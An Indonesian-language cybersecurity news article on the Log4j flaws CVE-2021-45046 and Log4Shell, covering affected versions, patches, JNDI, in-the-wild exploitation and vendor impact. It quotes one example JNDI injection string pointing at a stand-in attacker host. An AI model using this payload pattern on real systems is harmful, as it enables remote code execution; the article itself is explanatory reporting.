Kerentanan kedua — dilacak sebagai CVE-2021-45046 — diberi peringkat 3,7 dari maksimum 10 pemeringkatan keamanan pada sistem peringkat CVSS dan mempengaruhi semua versi Log4j dari 2.0-beta9 hingga 2.12.1 dan 2.13.0 hingga 2.15.0, yang pengelola proyek dikirim minggu lalu untuk mengatasi kerentanan eksekusi kode jarak jauh yang kritis (CVE-2021-44228) yang dapat disalahgunakan untuk menyusup dan mengambil alih sistem.
Patch yang tidak lengkap dari CVE-2021-44228, dapat disalahgunakan untuk "membuat data input berbahaya menggunakan pola JNDI Lookup yang menghasilkan serangan denial-of-service (DoS)," kata ASF dalam nasihat baru. Versi terbaru Log4j, 2.16.0 (untuk pengguna yang membutuhkan Java 8 atau yang lebih baru), semuanya kecuali menghapus dukungan untuk pencarian pesan dan menonaktifkan JNDI secara default, komponen yang menjadi inti dari kerentanan. Pengguna atau user yang membutuhkan Java 7 disarankan untuk meningkatkan ke Log4j rilis 2.12.2 saat sudah tersedia.
"Berurusan dengan CVE-2021-44228 telah menunjukkan JNDI memiliki masalah keamanan yang signifikan," Ralph Goers dari ASF menjelaskan. "Meskipun kami telah mengurangi apa yang kami ketahui, akan lebih aman bagi pengguna untuk menonaktifkannya sepenuhnya secara default, terutama karena sebagian besar tidak mungkin menggunakannya."
Perlu diketahui JNDI adalah kepanjangan dari Java Naming and Directory Interface, adalah Java API yang memungkinkan aplikasi yang dikodekan dalam bahasa pemrograman untuk mencari data dan sumber daya seperti server LDAP. Jika diibaratkan Log4Shell adalah penduduk di perpustakaan (library) Log4j, kerangka kerja logging berbasis Java open-source yang biasa dimasukkan ke dalam server web Apache.
Masalah itu sendiri terjadi ketika komponen JNDI dari konektor LDAP dimanfaatkan untuk menyuntikkan permintaan LDAP yang berbahaya — sesuatu seperti "${jndi:ldap://attacker_controled_website/payload_to_be_executed}" — yang, saat masuk ke server web yang menjalankan versi rentan perpustakaan, memungkinkan musuh untuk mengambil muatan dari domain jarak jauh dan menjalankannya secara lokal.
Pembaruan terbaru tiba sebagai dampak dari cacat telah mengakibatkan "pandemi dunia maya yang sebenarnya," apa dengan beberapa pelaku ancaman merebut Log4Shell dengan cara yang meletakkan dasar untuk serangan lebih lanjut, termasuk menyebarkan penambang koin, trojan akses jarak jauh, dan ransomware pada rentan mesin. Intrusi oportunistik dikatakan telah dimulai setidaknya sejak 1 Desember, meskipun bug menjadi pengetahuan umum pada 9 Desember.
Cacat keamanan telah memicu alarm luas karena ada dalam kerangka logging yang hampir digunakan di mana-mana dalam aplikasi Java, menghadirkan aktor jahat dengan gerbang yang belum pernah terjadi sebelumnya untuk menembus dan membahayakan jutaan perangkat di seluruh dunia.
Mengeja masalah lebih lanjut untuk organisasi, kelemahan yang dapat dieksploitasi dari jarak jauh juga berdampak pada ratusan produk perusahaan besar dari sejumlah perusahaan seperti Akamai, Amazon, Apache, Apereo, Atlassian, Broadcom, Cisco, Cloudera, ConnectWise, Debian, Docker, Fortinet, Google, IBM, Intel, Juniper Networks, Microsoft, Okta, Oracle, Red Hat, SolarWinds, SonicWall, Splunk, Ubuntu, VMware, Zscaler, dan Zoho, menimbulkan risiko rantai pasokan perangkat lunak yang signifikan.
"Tidak seperti serangan siber besar lainnya yang melibatkan satu atau beberapa perangkat lunak, Log4j pada dasarnya tertanam di setiap produk atau layanan web berbasis Java. Sangat sulit untuk memulihkannya secara manual," kata perusahaan keamanan Israel, Check Point. "Kerentanan ini, karena kerumitan dalam menambalnya dan kemudahan untuk dieksploitasi, tampaknya akan tetap ada selama bertahun-tahun yang akan datang, kecuali jika perusahaan dan layanan mengambil tindakan segera untuk mencegah serangan terhadap produk mereka dengan menerapkan perlindungan."
Pada hari-hari setelah bug itu diungkapkan, setidaknya sepuluh kelompok berbeda telah ikut serta dalam eksploitasi dan sekitar 44% jaringan perusahaan secara global telah diserang, menandai semacam eskalasi yang signifikan. Badan Keamanan Cybersecurity dan Infrastruktur AS (CISA) juga telah menambahkan Log4Shell ke Katalog Kerentanan yang Diketahui Eksploitasi, memberi agen federal batas waktu hingga 24 Desember untuk memasukkan tambalan atau perbaikan untuk kerentanan.
Sean Gallagher, peneliti ancaman senior di Sophos, memperingatkan bahwa "musuh kemungkinan akan mengambil sebanyak mungkin akses ke apa pun yang bisa mereka dapatkan saat ini dengan tujuan untuk memonetisasi dan/atau memanfaatkannya nanti," ia menambahkan "ada jeda sebelum badai dalam hal aktivitas yang lebih jahat dari kerentanan Log4Shell."
"Prioritas paling mendesak bagi para pembela HAM adalah untuk mengurangi eksposur dengan menambal dan mengurangi semua sudut infrastruktur mereka dan menyelidiki sistem yang terbuka dan berpotensi disusupi. Kerentanan ini dapat terjadi di mana-mana," tambah Gallagher.
Temukan artikel atau berita tentang keamanan siber hanya disini, Bagikan berita ini jika dirasa perlu, ikuti kami di Facebook dan Linkedin, terima kasih.
Posting Komentar